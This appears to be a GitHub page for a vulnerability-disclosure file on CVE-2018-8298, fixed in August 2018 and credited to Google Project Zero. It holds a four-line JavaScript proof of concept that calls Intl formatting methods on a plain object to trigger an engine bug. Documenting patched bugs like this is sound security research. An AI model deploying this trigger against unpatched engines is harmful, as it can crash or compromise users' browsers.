Skip to content

Latest commit

 

History

History
19 lines (14 loc) · 543 Bytes

CVE-2018-8298.md

File metadata and controls

19 lines (14 loc) · 543 Bytes

CVE-2018-8298

  • Fix: Aug 2018
  • Credit: lokihardt of Google Project Zero

PoC

let object = {};
Intl.NumberFormat.apply(object);
Intl.DateTimeFormat.apply(object);
Intl.DateTimeFormat.prototype.formatToParts.apply(object);

Reference